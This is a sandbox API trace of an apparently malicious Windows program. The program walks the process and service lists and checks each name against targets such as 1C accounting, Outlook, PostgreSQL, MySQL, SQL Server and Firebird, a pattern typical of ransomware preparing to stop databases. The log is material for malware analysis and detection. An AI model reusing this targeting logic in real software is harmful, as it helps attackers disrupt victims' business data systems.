	[0153.259] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0153.259] lstrlenW (lpString="svchost.exe") returned 11
	[0153.259] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0153.259] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0153.259] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0153.259] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0153.259] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0153.260] lstrlenW (lpString="svchost.exe") returned 11
	[0153.260] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0153.260] lstrlenW (lpString="svchost.exe") returned 11
	[0153.260] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0153.260] lstrlenW (lpString="svchost.exe") returned 11
	[0153.260] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0153.261] lstrlenW (lpString="audiodg.exe") returned 11
	[0153.261] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0153.261] lstrlenW (lpString="svchost.exe") returned 11
	[0153.261] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0153.262] lstrlenW (lpString="svchost.exe") returned 11
	[0153.262] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0153.262] lstrlenW (lpString="spoolsv.exe") returned 11
	[0153.262] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0153.262] lstrlenW (lpString="svchost.exe") returned 11
	[0153.262] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0153.263] lstrlenW (lpString="taskhost.exe") returned 12
	[0153.263] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0153.263] lstrlenW (lpString="userinit.exe") returned 12
	[0153.263] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0153.263] lstrlenW (lpString="dwm.exe") returned 7
	[0153.263] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0153.264] lstrlenW (lpString="explorer.exe") returned 12
	[0153.264] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0153.264] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0153.264] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0153.264] lstrlenW (lpString="reader_sl.exe") returned 13
	[0153.264] Process32NextW (in: hSnapshot=0x3d4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0153.265] CloseHandle (hObject=0x3d4) returned 1
	[0153.265] Sleep (dwMilliseconds=0x1f4) 
	[0154.145] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb617278
	[0154.491] EnumServicesStatusExW (in: hSCManager=0xb617278, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0154.589] GetLastError () returned 0xea
	[0154.589] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe90) returned 0xc0d0058
	[0154.589] EnumServicesStatusExW (in: hSCManager=0xb617278, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xc0d0058, cbBufSize=0xe90, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xc0d0058, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0154.733] CloseServiceHandle (hSCObject=0xb617278) returned 1
	[0154.734] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0154.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0154.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0154.734] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0154.734] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0154.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0154.734] lstrlenW (lpString="AudioSrv") returned 8
	[0154.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0154.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0154.734] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0154.734] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0154.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0154.734] lstrlenW (lpString="BFE") returned 3
	[0154.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0154.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0154.734] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0154.734] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0154.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0154.734] lstrlenW (lpString="CryptSvc") returned 8
	[0154.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0154.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0154.734] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0154.734] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0154.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0154.734] lstrlenW (lpString="CscService") returned 10
	[0154.734] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0154.734] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0154.734] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0154.734] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0154.734] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0154.734] lstrlenW (lpString="DcomLaunch") returned 10
	[0154.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0154.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0154.735] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0154.735] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0154.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0154.735] lstrlenW (lpString="Dhcp") returned 4
	[0154.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0154.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0154.735] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0154.735] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0154.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0154.735] lstrlenW (lpString="Dnscache") returned 8
	[0154.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0154.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0154.735] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0154.735] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0154.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0154.735] lstrlenW (lpString="DPS") returned 3
	[0154.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0154.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0154.735] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0154.735] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0154.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0154.735] lstrlenW (lpString="eventlog") returned 8
	[0154.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0154.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0154.735] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0154.735] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0154.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0154.735] lstrlenW (lpString="EventSystem") returned 11
	[0154.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0154.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0154.736] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0154.736] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0154.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0154.736] lstrlenW (lpString="gpsvc") returned 5
	[0154.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0154.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0154.736] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0154.736] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0154.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0154.736] lstrlenW (lpString="iphlpsvc") returned 8
	[0154.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0154.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0154.736] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0154.736] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0154.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0154.736] lstrlenW (lpString="LanmanServer") returned 12
	[0154.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0154.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0154.736] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0154.736] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0154.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0154.736] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0154.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0154.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0154.736] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0154.736] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0154.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0154.736] lstrlenW (lpString="lmhosts") returned 7
	[0154.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0154.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0154.736] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0154.737] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0154.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0154.737] lstrlenW (lpString="MMCSS") returned 5
	[0154.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0154.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0154.737] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0154.737] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0154.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0154.737] lstrlenW (lpString="MpsSvc") returned 6
	[0154.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0154.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0154.737] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0154.737] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0154.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0154.737] lstrlenW (lpString="NlaSvc") returned 6
	[0154.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0154.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0154.737] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0154.737] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0154.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0154.737] lstrlenW (lpString="nsi") returned 3
	[0154.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0154.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0154.737] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0154.737] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0154.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0154.737] lstrlenW (lpString="PcaSvc") returned 6
	[0154.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0154.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0154.737] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0154.737] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0154.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0154.738] lstrlenW (lpString="PlugPlay") returned 8
	[0154.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0154.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0154.738] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0154.738] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0154.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0154.738] lstrlenW (lpString="Power") returned 5
	[0154.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0154.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0154.738] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0154.738] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0154.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0154.738] lstrlenW (lpString="ProfSvc") returned 7
	[0154.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0154.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0154.738] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0154.738] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0154.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0154.738] lstrlenW (lpString="RpcEptMapper") returned 12
	[0154.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0154.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0154.738] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0154.738] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0154.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0154.738] lstrlenW (lpString="RpcSs") returned 5
	[0154.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0154.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0154.738] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0154.738] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0154.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0154.738] lstrlenW (lpString="SamSs") returned 5
	[0154.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0154.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0154.739] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0154.739] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0154.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0154.739] lstrlenW (lpString="Schedule") returned 8
	[0154.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0154.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0154.739] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0154.739] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0154.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0154.739] lstrlenW (lpString="SENS") returned 4
	[0154.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0154.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0154.739] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0154.739] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0154.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0154.739] lstrlenW (lpString="ShellHWDetection") returned 16
	[0154.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0154.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0154.739] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0154.739] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0154.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0154.739] lstrlenW (lpString="Spooler") returned 7
	[0154.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0154.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0154.739] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0154.739] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0154.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0154.739] lstrlenW (lpString="SysMain") returned 7
	[0154.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0154.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0154.740] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0154.740] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0154.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0154.740] lstrlenW (lpString="Themes") returned 6
	[0154.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0154.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0154.740] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0154.740] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0154.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0154.740] lstrlenW (lpString="TrkWks") returned 6
	[0154.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0154.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0154.740] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0154.740] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0154.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0154.740] lstrlenW (lpString="UxSms") returned 5
	[0154.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0154.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0154.740] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0154.740] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0154.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0154.740] lstrlenW (lpString="Winmgmt") returned 7
	[0154.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0154.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0154.740] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0154.740] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0154.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0154.740] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xc0d0058 | out: hHeap=0x7ab0000) returned 1
	[0154.740] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x384
	[0154.742] Process32FirstW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0154.743] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0154.743] lstrlenW (lpString="System") returned 6
	[0154.743] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0154.743] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0154.743] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0154.743] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0154.743] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0154.743] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0154.743] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0154.743] Process32NextW (in: hSnapshot=0x384, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
